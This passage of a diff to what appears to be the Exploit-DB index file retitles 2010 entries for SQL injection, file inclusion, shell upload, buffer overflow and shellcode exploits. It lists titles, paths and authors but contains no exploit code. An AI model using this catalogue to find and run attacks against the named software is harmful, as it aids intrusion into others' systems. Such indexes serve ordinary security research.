Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 -12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 -12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 +12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 +12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla Component Wap4Joomla - (wapmain.php) SQL Injection",2010-04-28,Manas58,php,webapps,0 12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 -12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 +12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook - (casting_view.php) SQL Injection",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection",2010-04-28,v3n0m,php,webapps,0 12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass",2010-04-29,Sid3^effects,php,webapps,0 @@ -11390,7 +11390,7 @@ id,file,description,date,author,platform,type,port 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - (announcements.php) SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL/XPath Injection",2010-05-02,indoushka,php,webapps,0 -12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 Shell Upload",2010-05-02,indoushka,php,webapps,0 +12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Shell Upload",2010-05-02,indoushka,php,webapps,0 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (RFI/LFI) Multiple File Include",2010-05-02,"cr4wl3r ",php,webapps,0 12487,platforms/windows/dos/12487.html,"JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,"cr4wl3r ",php,webapps,0 @@ -11423,7 +11423,7 @@ id,file,description,date,author,platform,type,port 12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - LFI",2010-05-06,"ALTBTA ",php,webapps,0 -12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS SQL Injection",2010-05-06,MasterGipy,php,webapps,0 +12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,php,webapps,0 12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution Exploit",2010-05-06,"JosS and eidelweiss",php,webapps,0 12524,platforms/windows/dos/12524.py,"Windows SMB2 Negotiate Protocol (0x72) Response DoS",2010-05-07,"Jelmer de Hen",windows,dos,0 12525,platforms/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps,0 @@ -11463,14 +11463,14 @@ id,file,description,date,author,platform,type,port 12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI",2010-05-11,CoBRa_21,php,webapps,0 12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,indoushka,php,webapps,0 -12568,platforms/php/webapps/12568.txt,"Digital College 1.0 Upload",2010-05-11,indoushka,php,webapps,0 +12568,platforms/php/webapps/12568.txt,"Digital College 1.0 - Upload",2010-05-11,indoushka,php,webapps,0 12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site Upload Shell Exploit",2010-05-11,indoushka,php,webapps,0 12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech - (page.asp) SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment CMS - (user_info.php) SQL Injection",2010-05-11,XroGuE,php,webapps,0 12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory corruption) Code Execution Exploit (0Day)",2010-05-11,"Krystian Kloskowski",windows,remote,0 12574,platforms/php/webapps/12574.txt,"Joomla Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0 -12575,platforms/php/webapps/12575.txt,"Marinet CMS SQL Injection",2010-05-11,XroGuE,php,webapps,0 +12575,platforms/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps,0 12576,platforms/php/webapps/12576.txt,"Woodall Creative SQL Injection",2010-05-11,XroGuE,php,webapps,0 12577,platforms/php/webapps/12577.txt,"Marinet CMS SQL/XSS/HTML Injection",2010-05-11,CoBRa_21,php,webapps,0 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 @@ -11612,11 +11612,11 @@ id,file,description,date,author,platform,type,port 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design - (index2.php) SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12723,platforms/php/webapps/12723.py,"Joomla com_qpersonel - SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0 12724,platforms/php/webapps/12724.php,"WebAsys - Blind SQL Injection Exploit",2010-05-24,zsh.shell,php,webapps,0 -12725,platforms/php/webapps/12725.txt,"ALSCO CMS SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0 +12725,platforms/php/webapps/12725.txt,"ALSCO CMS - SQL Injection",2010-05-24,PrinceofHacking,php,webapps,0 12726,platforms/php/webapps/12726.txt,"REvolution 10.02 - CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12727,platforms/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure",2010-05-24,"Praveen Darshanam",windows,webapps,0 -12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 +12729,platforms/php/webapps/12729.txt,"Blox CMS - SQL Injection",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection",2010-05-24,cyberlog,multiple,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 @@ -11627,14 +11627,14 @@ id,file,description,date,author,platform,type,port 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0Day)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 - (page_show) SQL Injection",2010-05-25,"BLack Revenge",php,webapps,0 -12744,platforms/php/webapps/12744.txt,"Webit CMS SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 +12744,platforms/php/webapps/12744.txt,"Webit CMS - SQL Injection",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL / XSS / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - (pages.php) SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery - (aboutbook.php) SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) CSRF Exploit",2010-05-26,l3D,windows,webapps,0 -12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 ABR File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 -12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 GRD File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 -12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote BoF PoC",2010-05-26,LiquidWorm,windows,dos,0 +12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - .ABR File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 +12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - .GRD File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 +12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - .ASL File Handling Remote BoF PoC",2010-05-26,LiquidWorm,windows,dos,0 12754,platforms/php/webapps/12754.html,"Easy Address book Webserver 1.2 - CSRF",2010-05-26,Markot,php,webapps,0 12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall - (itemdetail.php & shop.php) SQL Injection",2010-05-26,CoBRa_21,php,webapps,0 12756,platforms/php/webapps/12756.txt,"Spaceacre - (index.php) SQL/HTML/XSS Injection",2010-05-26,CoBRa_21,php,webapps,0 @@ -11646,7 +11646,7 @@ id,file,description,date,author,platform,type,port 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI",2010-05-27,kaMtiEz,php,webapps,0 -12770,platforms/php/webapps/12770.txt,"toronja CMS SQL Injection",2010-05-27,cyberlog,php,webapps,0 +12770,platforms/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,php,webapps,0 12771,platforms/php/webapps/12771.txt,"Toronja CMS HTML/XSS Injection",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0 @@ -11665,7 +11665,7 @@ id,file,description,date,author,platform,type,port 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 12791,platforms/php/webapps/12791.txt,"Aim Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12792,platforms/php/webapps/12792.txt,"MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 -12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS SQL Injection",2010-05-29,cyberlog,php,webapps,0 +12793,platforms/php/webapps/12793.txt,"Cosmos Solutions CMS - SQL Injection",2010-05-29,cyberlog,php,webapps,0 12794,platforms/php/webapps/12794.txt,"Cosmos Solutions CMS - (id= / page=) SQL Injection",2010-05-29,gendenk,php,webapps,0 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz - SQL Injection Exploit",2010-05-29,"Valentin Hoebel",php,webapps,0 12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local Shell Upload",2010-05-29,kannibal615,php,webapps,0 @@ -11703,7 +11703,7 @@ id,file,description,date,author,platform,type,port 12849,platforms/php/webapps/12849.txt,"slogan design Script SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection",2010-06-03,v4lc0m87,php,webapps,0 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 -12853,platforms/windows/dos/12853.py,"Quick - 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 +12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Exploit",2010-06-03,b0nd,windows,dos,0 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,php,webapps,0 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - Remote File Upload",2010-06-03,indoushka,php,webapps,0 12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0 @@ -12118,7 +12118,7 @@ id,file,description,date,author,platform,type,port 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0Day)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 -13762,platforms/php/webapps/13762.txt,"CommonSense CMS SQL Injection",2010-06-07,Pokeng,php,webapps,0 +13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM (0Day)",2010-06-07,sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 @@ -12172,7 +12172,7 @@ id,file,description,date,author,platform,type,port 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Exploit Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 -13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 INDD File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 +13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - .INDD File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / DoS",2010-06-11,Dr_IDE,windows,remote,0 13819,platforms/php/webapps/13819.txt,"E-PHP B2B Marketplace - Multiple Vulnerabilities",2010-06-11,MizoZ,php,webapps,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 @@ -12255,7 +12255,7 @@ id,file,description,date,author,platform,type,port 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 -13911,platforms/php/webapps/13911.txt,"Live CMS SQL Injection",2010-06-17,ahwak2000,php,webapps,0 +13911,platforms/php/webapps/13911.txt,"Live CMS - SQL Injection",2010-06-17,ahwak2000,php,webapps,0 13912,platforms/php/webapps/13912.txt,"Havij 1.10 - Persistent XSS",2010-06-17,hexon,php,webapps,0 13915,platforms/lin_x86-64/shellcode/13915.txt,"Linux/x86-64 - setuid(0) & chmod (_/etc/passwd__ 0777) & exit(0) shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13916,platforms/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - (print&sid) SQL Injection",2010-06-17,Gamoscu,php,webapps,0 @@ -12297,7 +12297,7 @@ id,file,description,date,author,platform,type,port 13957,platforms/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 - (SFTP Module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"teamspeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 -14363,platforms/php/webapps/14363.txt,"Ad Network Script Persistent XSS",2010-07-14,Sid3^effects,php,webapps,0 +14363,platforms/php/webapps/14363.txt,"Ad Network Script - Persistent XSS",2010-07-14,Sid3^effects,php,webapps,0 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",php,webapps,0 @@ -12316,7 +12316,7 @@ id,file,description,date,author,platform,type,port 13977,platforms/php/webapps/13977.txt,"Social Community Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script SQL Injection",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 - (catid) SQL Injection",2010-06-22,v3n0m,php,webapps,0 -13980,platforms/php/webapps/13980.txt,"Cornerstone CMS SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 +13980,platforms/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",php,webapps,0 13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery - LFI",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS - (e4700.asp?id) SQL Injection",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,php,webapps,0 @@ -12353,7 +12353,7 @@ id,file,description,date,author,platform,type,port 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0 14020,platforms/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / XSS",2010-06-24,Sangteamtham,php,webapps,0 -14026,platforms/php/webapps/14026.txt,"AbleDating script SQL Injection",2010-06-24,JaMbA,php,webapps,0 +14026,platforms/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 14028,platforms/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 @@ -12375,7 +12375,7 @@ id,file,description,date,author,platform,type,port 14053,platforms/php/webapps/14053.txt,"snipe gallery Script SQL Injection",2010-06-25,"dev!l ghost",php,webapps,0 14054,platforms/php/webapps/14054.txt,"Joomla Component JE Story Submit - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 -14056,platforms/php/webapps/14056.txt,"Clicker CMS Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 +14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component - Persistent XSS",2010-06-26,Sid3^effects,php,webapps,0 @@ -12399,7 +12399,7 @@ id,file,description,date,author,platform,type,port 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 14080,platforms/php/webapps/14080.txt,"I-Net MLM Script Engine SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0 -14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection Vunerability",2010-06-27,"L0rd CrusAd3r",php,webapps,0 +14084,platforms/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",php,webapps,0 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 14097,platforms/arm/shellcode/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",arm,shellcode,0 @@ -12412,7 +12412,7 @@ id,file,description,date,author,platform,type,port 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 14106,platforms/php/webapps/14106.txt,"PHPDirector 0.30 - (videos.php) SQL Injection",2010-06-29,Mr-AbdoX,php,webapps,0 14107,platforms/php/webapps/14107.txt,"YPNinc JokeScript (ypncat_id) SQL Injection",2010-06-29,v3n0m,php,webapps,0 -14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 +14104,platforms/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",multiple,webapps,0 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender 4.01-3 - Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 @@ -12429,7 +12429,7 @@ id,file,description,date,author,platform,type,port 14142,platforms/arm/shellcode/14142.c,"Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) shellcode (84 bytes)",2010-06-30,"Florian Gaultier",arm,shellcode,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - (CoolType.dll) Remote Memory Corruption / DoS",2010-06-29,LiquidWorm,multiple,dos,0 14122,platforms/arm/shellcode/14122.txt,"Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",arm,shellcode,0 -14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - (id) SQL Injection",2010-06-30,v3n0m,php,webapps,0 @@ -12441,7 +12441,7 @@ id,file,description,date,author,platform,type,port 14145,platforms/php/webapps/14145.txt,"Golf Club Site SQL Injection",2010-06-30,JaMbA,php,webapps,0 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0Day)",2010-06-30,emgent,hardware,webapps,80 14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF",2010-07-01,"ADEO Security",php,webapps,0 -14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 +14149,platforms/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",asp,webapps,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR + DEP Bypass)",2010-07-01,Node,windows,local,0 14151,platforms/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 14152,platforms/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 @@ -12449,7 +12449,7 @@ id,file,description,date,author,platform,type,port 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection",2010-07-01,K053,asp,webapps,0 14209,platforms/php/webapps/14209.txt,"Joomla Front-End Article Manager System - Upload",2010-07-04,Sid3^effects,php,webapps,0 -14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free",2010-07-01,MSRC,windows,dos,0 +14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-after-free",2010-07-01,MSRC,windows,dos,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection",2010-07-02,"Salvatore Fresta",php,webapps,0 @@ -12469,7 +12469,7 @@ id,file,description,date,author,platform,type,port 14180,platforms/windows/remote/14180.py,"HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 -14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 +14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 @@ -12642,7 +12642,7 @@ id,file,description,date,author,platform,type,port 14394,platforms/php/webapps/14394.txt,"Joomla Component (com_spa) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14395,platforms/php/webapps/14395.txt,"Joomla Component (com_staticxt) - SQL Injection",2010-07-17,"Palyo34 and KroNicKq",php,webapps,0 14397,platforms/windows/local/14397.rb,"MoreAmp - SEH Buffer Overflow (Metasploit)",2010-07-17,Madjix,windows,local,0 -14404,platforms/php/webapps/14404.txt,"Kayako eSupport (functions.php) 3.70.02 - SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0 +14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 